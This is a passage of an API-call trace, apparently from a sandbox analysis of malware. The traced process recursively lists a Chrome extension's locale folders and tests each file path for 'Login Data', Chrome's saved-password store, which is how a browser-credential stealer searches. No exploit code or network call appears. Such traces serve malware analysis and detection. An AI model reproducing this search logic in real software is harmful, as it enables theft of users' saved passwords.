lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.630] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr") returned 137 [0161.630] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr") returned 137 [0161.630] lstrlenW (lpString="\\*.*") returned 4 [0161.630] GetProcessHeap () returned 0x8e0000 [0161.630] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.630] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr" [0161.630] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\*.*" [0161.630] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.631] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.631] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.631] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.631] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.631] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.631] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr") returned 137 [0161.631] lstrlenW (lpString="\\") returned 1 [0161.631] GetProcessHeap () returned 0x8e0000 [0161.631] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.631] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr" [0161.631] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\" [0161.631] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\") returned 138 [0161.631] lstrlenW (lpString="messages.json") returned 13 [0161.631] GetProcessHeap () returned 0x8e0000 [0161.631] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.632] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\" [0161.632] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" [0161.632] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.632] GetProcessHeap () returned 0x8e0000 [0161.632] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.632] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.632] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.632] GetProcessHeap () returned 0x8e0000 [0161.632] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.632] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.632] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.632] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.632] GetProcessHeap () returned 0x8e0000 [0161.632] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.632] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.632] GetProcessHeap () returned 0x8e0000 [0161.632] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.632] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="uk", cAlternateFileName="")) returned 1 [0161.632] lstrcmpiW (lpString1="uk", lpString2=".") returned 1 [0161.632] lstrcmpiW (lpString1="uk", lpString2="..") returned 1 [0161.632] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.632] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.632] lstrlenW (lpString="\\") returned 1 [0161.632] GetProcessHeap () returned 0x8e0000 [0161.632] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.632] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.632] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.632] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.632] lstrlenW (lpString="uk") returned 2 [0161.632] GetProcessHeap () returned 0x8e0000 [0161.632] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.632] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.633] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk" [0161.633] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.633] GetProcessHeap () returned 0x8e0000 [0161.633] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.633] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk") returned 137 [0161.633] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk") returned 137 [0161.633] lstrlenW (lpString="\\*.*") returned 4 [0161.633] GetProcessHeap () returned 0x8e0000 [0161.633] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.633] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk" [0161.633] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\*.*" [0161.633] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.633] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.633] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.633] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.633] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.633] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10e, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.633] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk") returned 137 [0161.633] lstrlenW (lpString="\\") returned 1 [0161.633] GetProcessHeap () returned 0x8e0000 [0161.633] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.633] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk" [0161.633] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\" [0161.633] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\") returned 138 [0161.633] lstrlenW (lpString="messages.json") returned 13 [0161.633] GetProcessHeap () returned 0x8e0000 [0161.633] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.633] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\" [0161.634] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" [0161.634] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.634] GetProcessHeap () returned 0x8e0000 [0161.634] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.634] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json", lpSrch="Login Data") returned 0x0 [0161.634] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.634] GetProcessHeap () returned 0x8e0000 [0161.634] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.634] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10e, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.634] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.634] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.634] GetProcessHeap () returned 0x8e0000 [0161.634] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.634] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.634] GetProcessHeap () returned 0x8e0000 [0161.634] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.634] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="vi", cAlternateFileName="")) returned 1 [0161.634] lstrcmpiW (lpString1="vi", lpString2=".") returned 1 [0161.634] lstrcmpiW (lpString1="vi", lpString2="..") returned 1 [0161.634] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.634] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.634] lstrlenW (lpString="\\") returned 1 [0161.634] GetProcessHeap () returned 0x8e0000 [0161.634] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.634] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.634] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", 